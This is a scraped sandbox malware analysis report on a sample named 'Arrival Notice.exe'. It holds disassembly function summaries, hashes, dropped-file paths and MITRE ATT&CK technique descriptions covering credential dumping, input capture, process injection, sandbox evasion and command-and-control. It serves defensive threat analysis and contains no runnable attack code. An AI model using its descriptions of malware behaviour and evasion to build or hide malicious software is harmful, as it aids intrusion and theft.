Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: _wcsncpy
String ID: ^B$C:\Users\user\Desktop\Arrival Notice.exe
API String ID: 1735881322-1212067916
Opcode ID: f7c3fd886c497ae33bdd3057849675e3afdb83c7c480df0bc310b3c11edf5eb4
Instruction ID: 95fca152a805ab331260cabc3645652019b64b11bc5d0d7a1f408bc65d2df1f2
Opcode Fuzzy Hash: f7c3fd886c497ae33bdd3057849675e3afdb83c7c480df0bc310b3c11edf5eb4
Instruction Fuzzy Hash: ADE0C23360051A7B9710DE4AD841DBBF37DEEC4A20B08802AF90883200E2B1BD1A43E4

Function 00441BE8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441BFE
PostMessageW.USER32(00000000), ref: 00441C05

Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9

Strings

Shell_TrayWnd, xrefs: 00441BF7

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
Instruction ID: aba4e04af0122a293c2d26b46e7c49f9db856b5fc79b6d6ac13cebee95b63d36
Opcode Fuzzy Hash: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
Instruction Fuzzy Hash: EFD0A772BC13013BFA6077745D0FF8B66145B14711F000C3A7B42E61C1D4F8E4018758

Function 00441C20 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441C2A
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00441C3D

Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9

Strings

Shell_TrayWnd, xrefs: 00441C23

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
Instruction ID: e91d5bd0f3095d95abf168919443ed1e5ef8457e9bc9ee6dadeb2d3358a759b2
Opcode Fuzzy Hash: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
Instruction Fuzzy Hash: 61D0A772B843017BFA6077745D0FF8B66145B14711F000C3A7B46A61C1D4F8D4018758

Function 004370C3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 8windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 004370D1

Part of subcall function 004118DA: _doexit.LIBCMT ref: 004118E6

Strings

AutoIt, xrefs: 004370C5
Error allocating memory., xrefs: 004370CA

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: Message_doexit
String ID: AutoIt$Error allocating memory.
API String ID: 1993061046-4017498283
Opcode ID: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
Instruction ID: aa36ec6b1cc278624b5c670a1a0522bf80bf1016c56dd6686bcadf549e8ac499
Opcode Fuzzy Hash: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
Instruction Fuzzy Hash: F1B092323C030627E50437910D0BF9D26003B64F02F220C067324280D204C90090131D

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Arrival Notice.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\122-fVJ8

C:\Users\user\AppData\Local\Temp\aut3BB3.tmp

C:\Users\user\AppData\Local\Temp\aut3BE3.tmp

C:\Users\user\AppData\Local\Temp\isochronally

C:\Users\user\AppData\Local\Temp\savager

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Windows Analysis Report
Arrival Notice.exe

Function 0040D590 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 144
windowCOMMON

Function 0040E500 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 157
COMMON

Function 00452AC7 Relevance: 31.8, APIs: 21, Instructions: 343
COMMON

Function 0046E1A6 Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 231
COMMON

Function 00401F20 Relevance: 26.5, APIs: 8, Strings: 7, Instructions: 214
COMMON

Function 00452719 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 147
COMMON

Function 0040E360 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 151
COMMON

Function 004528BD Relevance: 19.7, APIs: 13, Instructions: 173
COMMON

Function 00410490 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 56
windowregistryCOMMON

Function 00410390 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 76
windowregistryCOMMON

Function 0040F5C0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 125
COMMON

Function 00401100 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136
windowtimeregistryCOMMON

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre